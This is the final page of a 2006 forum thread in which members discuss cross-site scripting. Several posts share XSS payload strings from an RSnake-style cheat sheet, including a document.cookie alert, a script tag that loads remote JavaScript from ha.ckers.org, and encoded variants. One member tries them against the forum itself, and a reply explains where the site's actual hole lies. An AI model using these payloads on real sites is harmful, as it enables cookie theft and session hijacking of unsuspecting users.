zabbix
+ Reply to Thread
Page 7 of 7 FirstFirst ... 567
Results 91 to 97 of 97

Thread: My Site

  1. #91
    Join Date
    Nov 2006
    Posts
    39
    oh cool so thats how you inject it huh like <img src="javascript:alert("LIKE THIS?")">

  2. #92
    Join Date
    Nov 2006
    Posts
    39
    <img src='javascript:alert("HELLO")'>

  3. #93
    Join Date
    Sep 2006
    Posts
    1,649
    Yeah, but these forums aren't vulnerable

    Put this in your web browser's address bar
    Code:
    javascript:alert("Hello");
    A popup shoudl come up saying Hello. Injections can use any javascript code, it just has to be sytaxed a little differently.

  4. #94
    Join Date
    Nov 2006
    Posts
    39
    oh ok ya i nkow a lol bit of java lol thats how u got my password

  5. #95
    Join Date
    Nov 2006
    Posts
    39
    Good nIght guys

  6. #96
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by Moonbat
    Hmm, lemme test for some more xss vulnerablities, other than the one mike found. If they work, a popup should come up

    <img src='john.jpg' onerror='alert(document.cookie)'>

    Here's one I found online

    <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

    Another one from the same site
    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

    <IMG SRC=javascript:alert(&quot;XSS&quot>

    Yet again

    <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>">

    <IMG SRC=javascript:alert(String.fromCharCode(88,8*,8*))>

    Differnet encodings: should output alert(xss) or whatever

    <IMG SRC=javascript:alert('XSS')>
    <IMG SRC=&#0000*06&#00000*7&#0000**8&#00000*7&#0000**5&#00000**&#0000**4&#0000*05&#0000**2&#0000**6&#0000 058&#00000*7&#0000*08&#0000*0*&#0000**4&#0000**6&#0000040&#00000**&#0000088&#000008*&#000008*&#00000 **&#000004*>

    <IMG SRC=&#x6A&#x6*&#x76&#x6*&#x7*&#x6*&#x72&#x6*&#x70&#x74&#x*A&#x6*&#x6C&#x65&#x72&#x74&#x28&#x27&#x58& #x5*&#x5*&#x27&#x2*>

    <IMG SRC="jav ascript:alert('XSS');">

    Using perl thngy (all from the site)
    perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

    <iframe src=http://ha.ckers.org/scriptlet.html>
    I'm sure I explained about this before.

    The vulnerability I found was in the search box of this website (the box in the top right of the page, next to 'latest news'), and is part of the actual website.

    The vBulletin forum we are posting in now has not been coded by the makers of this website, and has no relation to a bug in the website's programming. In other words, there is a vulnerability in this website's search box, but not the forum. vBulletin is a professional forum package and is mostly free of bugs. When hundreds of thousands of people rely on it for discussions, it has a certain responsibility to protect its users. Searching for vulnerabilities in forums is totally pointless.

    Forum = created by vBulletin staff.
    All-nettools.com = created by all-nettools.com staff.

    If a member of all-nettools staff creates a programming error, the forum remains unchanged because he didn't create the forum.

    It can let you run JavaScript commands on a website as if they were coming from the server.
    XSS vulnerabilities allow you to send users custom content when they request a page. The vulnerabilities allow you to inject code into a user's page. They are client-side, and have no impact on the server itself.
    Last edited by Ezekiel; 11-29-2006 at 12:29 PM.

  7. #97
    Join Date
    Sep 2006
    Posts
    1,649
    Ah, well, I got that definition from another site anyway.

    I know you told me about this before, I just wanted to keep trying. If everyone assumed everything was secure, and didn't try to find a hole in the security, hacking would cease to exist.

+ Reply to Thread

Similar Threads

  1. Web site
    By Unregistered in forum Proxies and Firewalls
    Replies: 2
    Last Post: 01-13-2005, 06:35 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts